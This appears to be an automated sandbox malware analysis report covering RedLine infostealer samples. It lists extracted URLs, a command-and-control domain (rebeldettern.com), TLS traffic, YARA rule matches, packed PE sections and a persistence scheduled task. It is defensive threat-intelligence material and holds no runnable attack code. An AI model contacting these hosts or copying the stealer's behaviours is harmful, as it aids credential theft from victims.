Source: 5bzo1pz.exe, 0000000E.00000000.4542302807.0000000001021000.00000002.00000001.01000000.0000000D.sdmp, 5bzo1pz.exe, 0000000E.00000002.4568824649.0000000005F95000.00000004.08000000.00040000.00000000.sdmp, 5bzo1pz.exe.7.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: 5bzo1pz.exe, 0000000E.00000000.4542302807.0000000001021000.00000002.00000001.01000000.0000000D.sdmp, 5bzo1pz.exe, 0000000E.00000002.4568824649.0000000005F95000.00000004.08000000.00040000.00000000.sdmp, 5bzo1pz.exe.7.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: 5bzo1pz.exe.7.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: 7fOMOTQ.exe, 0000000B.00000003.4291121881.0000000005B74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 5bzo1pz.exe, 0000000E.00000000.4542302807.0000000001021000.00000002.00000001.01000000.0000000D.sdmp, 5bzo1pz.exe, 0000000E.00000002.4568824649.0000000005F95000.00000004.08000000.00040000.00000000.sdmp, 5bzo1pz.exe.7.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: 7fOMOTQ.exe, 0000000B.00000003.4291121881.0000000005B74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: 7fOMOTQ.exe, 0000000B.00000003.4291121881.0000000005B74000.00000004.00000800.00020000.00000000.sdmp, 5bzo1pz.exe, 0000000E.00000000.4542302807.0000000001021000.00000002.00000001.01000000.0000000D.sdmp, 5bzo1pz.exe, 0000000E.00000002.4568824649.0000000005F95000.00000004.08000000.00040000.00000000.sdmp, 5bzo1pz.exe.7.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: 5bzo1pz.exe, 0000000E.00000000.4542302807.0000000001021000.00000002.00000001.01000000.0000000D.sdmp, 5bzo1pz.exe, 0000000E.00000002.4568824649.0000000005F95000.00000004.08000000.00040000.00000000.sdmp, 5bzo1pz.exe.7.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: 5bzo1pz.exe, 0000000E.00000000.4542302807.0000000001021000.00000002.00000001.01000000.0000000D.sdmp, 5bzo1pz.exe, 0000000E.00000002.4568824649.0000000005F95000.00000004.08000000.00040000.00000000.sdmp, 5bzo1pz.exe.7.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: 5bzo1pz.exe, 0000000E.00000000.4542302807.0000000001021000.00000002.00000001.01000000.0000000D.sdmp, 5bzo1pz.exe, 0000000E.00000002.4568824649.0000000005F95000.00000004.08000000.00040000.00000000.sdmp, 5bzo1pz.exe.7.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: 7fOMOTQ.exe, 0000000B.00000003.4291121881.0000000005B74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: loqVSeJ.exe, 00000009.00000003.2799658934.0000000008B36000.00000004.00000020.00020000.00000000.sdmp, loqVSeJ.exe, 00000009.00000003.2997458985.0000000008B37000.00000004.00000020.00020000.00000000.sdmp, loqVSeJ.exe, 00000009.00000003.2997360959.0000000008B37000.00000004.00000020.00020000.00000000.sdmp, loqVSeJ.exe, 00000009.00000003.2997490778.0000000008B37000.00000004.00000020.00020000.00000000.sdmp, loqVSeJ.exe, 00000009.00000003.2799576409.0000000008B22000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://purl.oen
Source: loqVSeJ.exe, 00000009.00000002.3001587383.00000000053DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: loqVSeJ.exe, 00000009.00000002.3001587383.0000000004F41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: loqVSeJ.exe, 00000009.00000002.3001587383.0000000004F90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: loqVSeJ.exe, 00000009.00000002.3001587383.0000000004F41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: loqVSeJ.exe, 00000009.00000002.3001587383.0000000004F41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
Source: loqVSeJ.exe, 00000009.00000002.3001587383.0000000004F41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: loqVSeJ.exe, 00000009.00000002.3001587383.0000000004F41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: loqVSeJ.exe, 00000009.00000002.3001587383.0000000004F90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: loqVSeJ.exe, 00000009.00000002.3001587383.0000000004F41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/0
Source: loqVSeJ.exe, 00000009.00000002.3001587383.0000000004F41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: loqVSeJ.exe, 00000009.00000002.3001587383.0000000004F41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: loqVSeJ.exe, 00000009.00000002.3001587383.0000000004F41000.00000004.00000800.00020000.00000000.sdmp, loqVSeJ.exe, 00000009.00000002.3001587383.0000000004F90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: loqVSeJ.exe, 00000009.00000002.3001587383.0000000004F41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: loqVSeJ.exe, 00000009.00000002.3001587383.0000000005052000.00000004.00000800.00020000.00000000.sdmp, loqVSeJ.exe, 00000009.00000002.3001587383.0000000004F90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: loqVSeJ.exe, 00000009.00000002.3001587383.0000000004F41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: loqVSeJ.exe, 00000009.00000002.3001587383.00000000053DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: loqVSeJ.exe, 00000009.00000002.3001587383.0000000004F41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: loqVSeJ.exe, 00000009.00000002.3001587383.0000000004F41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: loqVSeJ.exe, 00000009.00000002.3001587383.0000000004F41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: 5bzo1pz.exe, 0000000E.00000000.4542302807.0000000001021000.00000002.00000001.01000000.0000000D.sdmp, 5bzo1pz.exe, 0000000E.00000002.4568824649.0000000005F95000.00000004.08000000.00040000.00000000.sdmp, 5bzo1pz.exe.7.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: 7fOMOTQ.exe, 0000000B.00000003.4291121881.0000000005B74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: 7fOMOTQ.exe, 0000000B.00000003.4291121881.0000000005B74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: loqVSeJ.exe, 00000009.00000003.2805916378.0000000008D0A000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4254803496.0000000005B8C000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4254145055.0000000005B8F000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4254406828.0000000005B8C000.00000004.00000800.00020000.00000000.sdmp, tmp5404.tmp.9.dr, tmp23F6.tmp.9.dr, tmp53C2.tmp.9.dr, tmp23C4.tmp.9.dr, tmp5405.tmp.9.dr, tmp53E3.tmp.9.dr, tmp53B1.tmp.9.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: loqVSeJ.exe, 00000009.00000002.3001587383.0000000004F90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb
Source: loqVSeJ.exe, 00000009.00000002.3001587383.0000000004F90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip
Source: loqVSeJ.exe	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE
Source: loqVSeJ.exe, loqVSeJ.exe, 00000009.00000003.2643491766.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, loqVSeJ.exe, 00000009.00000002.2997665741.0000000000372000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: loqVSeJ.exe	String found in binary or memory: https://api.ipify.orgcookies//setti
Source: loqVSeJ.exe, loqVSeJ.exe, 00000009.00000003.2643491766.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, loqVSeJ.exe, 00000009.00000002.2997665741.0000000000372000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: 7fOMOTQ.exe, 0000000B.00000003.4294759850.0000000005B4E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: 7fOMOTQ.exe, 0000000B.00000003.4294759850.0000000005B4E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: loqVSeJ.exe, 00000009.00000003.2805916378.0000000008D0A000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4254803496.0000000005B8C000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4254145055.0000000005B8F000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4254406828.0000000005B8C000.00000004.00000800.00020000.00000000.sdmp, tmp5404.tmp.9.dr, tmp23F6.tmp.9.dr, tmp53C2.tmp.9.dr, tmp23C4.tmp.9.dr, tmp5405.tmp.9.dr, tmp53E3.tmp.9.dr, tmp53B1.tmp.9.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: loqVSeJ.exe, 00000009.00000003.2805916378.0000000008D0A000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4254803496.0000000005B8C000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4254145055.0000000005B8F000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4254406828.0000000005B8C000.00000004.00000800.00020000.00000000.sdmp, tmp5404.tmp.9.dr, tmp23F6.tmp.9.dr, tmp53C2.tmp.9.dr, tmp23C4.tmp.9.dr, tmp5405.tmp.9.dr, tmp53E3.tmp.9.dr, tmp53B1.tmp.9.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: loqVSeJ.exe, 00000009.00000003.2805916378.0000000008D0A000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4254803496.0000000005B8C000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4254145055.0000000005B8F000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4254406828.0000000005B8C000.00000004.00000800.00020000.00000000.sdmp, tmp5404.tmp.9.dr, tmp23F6.tmp.9.dr, tmp53C2.tmp.9.dr, tmp23C4.tmp.9.dr, tmp5405.tmp.9.dr, tmp53E3.tmp.9.dr, tmp53B1.tmp.9.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 7fOMOTQ.exe, 0000000B.00000003.4294759850.0000000005B4E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: 7fOMOTQ.exe, 0000000B.00000003.4294759850.0000000005B4E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: loqVSeJ.exe, 00000009.00000003.2805916378.0000000008D0A000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4254803496.0000000005B8C000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4254145055.0000000005B8F000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4254406828.0000000005B8C000.00000004.00000800.00020000.00000000.sdmp, tmp5404.tmp.9.dr, tmp23F6.tmp.9.dr, tmp53C2.tmp.9.dr, tmp23C4.tmp.9.dr, tmp5405.tmp.9.dr, tmp53E3.tmp.9.dr, tmp53B1.tmp.9.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: loqVSeJ.exe, 00000009.00000003.2805916378.0000000008D0A000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4254803496.0000000005B8C000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4254145055.0000000005B8F000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4254406828.0000000005B8C000.00000004.00000800.00020000.00000000.sdmp, tmp5404.tmp.9.dr, tmp23F6.tmp.9.dr, tmp53C2.tmp.9.dr, tmp23C4.tmp.9.dr, tmp5405.tmp.9.dr, tmp53E3.tmp.9.dr, tmp53B1.tmp.9.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: loqVSeJ.exe, 00000009.00000003.2805916378.0000000008D0A000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4254803496.0000000005B8C000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4254145055.0000000005B8F000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4254406828.0000000005B8C000.00000004.00000800.00020000.00000000.sdmp, tmp5404.tmp.9.dr, tmp23F6.tmp.9.dr, tmp53C2.tmp.9.dr, tmp23C4.tmp.9.dr, tmp5405.tmp.9.dr, tmp53E3.tmp.9.dr, tmp53B1.tmp.9.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 5bzo1pz[1].exe.7.dr	String found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
Source: 7fOMOTQ.exe, 0000000B.00000003.4294759850.0000000005B4E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: loqVSeJ.exe, loqVSeJ.exe, 00000009.00000003.2643491766.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, loqVSeJ.exe, 00000009.00000002.2997665741.0000000000372000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: 7fOMOTQ.exe, 0000000B.00000003.4374963913.0000000001348000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rebeldettern.com/
Source: 7fOMOTQ.exe, 0000000B.00000003.4251473882.00000000012EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rebeldettern.com/1)
Source: 7fOMOTQ.exe, 0000000B.00000003.4330579784.0000000001348000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4374162232.0000000001342000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000002.4378876477.0000000001349000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4329987890.0000000001347000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4374963913.0000000001348000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rebeldettern.com/60Br
Source: 7fOMOTQ.exe, 0000000B.00000003.4374283231.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4329987890.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000002.4378625943.00000000012D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rebeldettern.com/C
Source: 7fOMOTQ.exe, 0000000B.00000003.4374283231.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4311906705.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000002.4378625943.00000000012D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rebeldettern.com/L
Source: 7fOMOTQ.exe, 0000000B.00000003.4330579784.0000000001348000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4329987890.0000000001347000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4312946761.0000000001349000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4311857979.0000000001347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rebeldettern.com/Micr
Source: 7fOMOTQ.exe, 0000000B.00000003.4374162232.0000000001342000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000002.4378876477.0000000001349000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4374963913.0000000001348000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rebeldettern.com/Soft2
Source: 7fOMOTQ.exe, 0000000B.00000003.4374162232.0000000001342000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000002.4378876477.0000000001349000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4374963913.0000000001348000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rebeldettern.com/Y
Source: 7fOMOTQ.exe, 0000000B.00000003.4251473882.00000000012EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rebeldettern.com/a(X
Source: 7fOMOTQ.exe, 0000000B.00000003.4287871369.0000000005B47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rebeldettern.com/api
Source: 7fOMOTQ.exe, 0000000B.00000003.4251473882.00000000012EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rebeldettern.com/apip
Source: 7fOMOTQ.exe, 0000000B.00000003.4251473882.00000000012EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rebeldettern.com/apiu8
Source: 7fOMOTQ.exe, 0000000B.00000003.4374162232.0000000001342000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000002.4378876477.0000000001349000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4374963913.0000000001348000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rebeldettern.com/iNia
Source: 7fOMOTQ.exe, 0000000B.00000003.4330579784.0000000001348000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4329987890.0000000001347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rebeldettern.com/s
Source: 7fOMOTQ.exe, 0000000B.00000003.4251473882.00000000012EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rebeldettern.com/y(
Source: 7fOMOTQ.exe, 0000000B.00000003.4251473882.00000000012EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rebeldettern.com:443/api
Source: 7fOMOTQ.exe, 0000000B.00000003.4293710391.0000000005C64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 7fOMOTQ.exe, 0000000B.00000003.4293710391.0000000005C64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: 7fOMOTQ.exe, 0000000B.00000003.4294759850.0000000005B4E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: 7fOMOTQ.exe, 0000000B.00000003.4240268989.000000000133F000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4239979486.000000000130B000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4239979486.00000000012F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: 7fOMOTQ.exe, 0000000B.00000003.4240268989.000000000133F000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4239979486.000000000130B000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4239979486.00000000012F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: loqVSeJ.exe, 00000009.00000003.2805916378.0000000008D0A000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4254803496.0000000005B8C000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4254145055.0000000005B8F000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4254406828.0000000005B8C000.00000004.00000800.00020000.00000000.sdmp, tmp5404.tmp.9.dr, tmp23F6.tmp.9.dr, tmp53C2.tmp.9.dr, tmp23C4.tmp.9.dr, tmp5405.tmp.9.dr, tmp53E3.tmp.9.dr, tmp53B1.tmp.9.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: loqVSeJ.exe, 00000009.00000003.2805916378.0000000008D0A000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4254803496.0000000005B8C000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4254145055.0000000005B8F000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4254406828.0000000005B8C000.00000004.00000800.00020000.00000000.sdmp, tmp5404.tmp.9.dr, tmp23F6.tmp.9.dr, tmp53C2.tmp.9.dr, tmp23C4.tmp.9.dr, tmp5405.tmp.9.dr, tmp53E3.tmp.9.dr, tmp53B1.tmp.9.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 7fOMOTQ.exe, 0000000B.00000003.4293195407.0000000005B70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.or
Source: 7fOMOTQ.exe, 0000000B.00000003.4293195407.0000000005B70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: 7fOMOTQ.exe, 0000000B.00000003.4293710391.0000000005C64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: 7fOMOTQ.exe, 0000000B.00000003.4293710391.0000000005C64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: 7fOMOTQ.exe, 0000000B.00000003.4293710391.0000000005C64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 7fOMOTQ.exe, 0000000B.00000003.4294759850.0000000005B4E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_

Source: unknown	Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50064 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown	Network traffic detected: HTTP traffic on port 50070 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 50059 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50068 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50066 -> 443

Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.6:50058 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.6:50059 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.6:50061 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.6:50062 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.6:50064 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.6:50066 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.6:50068 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.6:50070 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.2.loqVSeJ.exe.370000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 9.2.loqVSeJ.exe.370000.0.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 9.2.loqVSeJ.exe.370000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000009.00000003.2643491766.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000009.00000002.2997665741.0000000000372000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: loqVSeJ.exe PID: 2848, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown

PE file contains section with special chars

Source: Ryay9q4aDy.exe	Static PE information: section name:
Source: Ryay9q4aDy.exe	Static PE information: section name: .idata
Source: Ryay9q4aDy.exe	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: 7fOMOTQ[1].exe.7.dr	Static PE information: section name:
Source: 7fOMOTQ[1].exe.7.dr	Static PE information: section name: .idata
Source: 7fOMOTQ[1].exe.7.dr	Static PE information: section name:
Source: 7fOMOTQ.exe.7.dr	Static PE information: section name:
Source: 7fOMOTQ.exe.7.dr	Static PE information: section name: .idata
Source: 7fOMOTQ.exe.7.dr	Static PE information: section name:
Source: loqVSeJ[1].exe.7.dr	Static PE information: section name:
Source: loqVSeJ[1].exe.7.dr	Static PE information: section name: .idata
Source: loqVSeJ[1].exe.7.dr	Static PE information: section name:
Source: loqVSeJ.exe.7.dr	Static PE information: section name:
Source: loqVSeJ.exe.7.dr	Static PE information: section name: .idata
Source: loqVSeJ.exe.7.dr	Static PE information: section name:
Source: tmp2A3C.tmp.9.dr	Static PE information: section name:
Source: tmp2A3C.tmp.9.dr	Static PE information: section name: .idata
Source: tmp2A3C.tmp.9.dr	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\Ryay9q4aDy.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Code function: 9_2_04C0E7B0	9_2_04C0E7B0
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Code function: 9_2_04C0DC90	9_2_04C0DC90
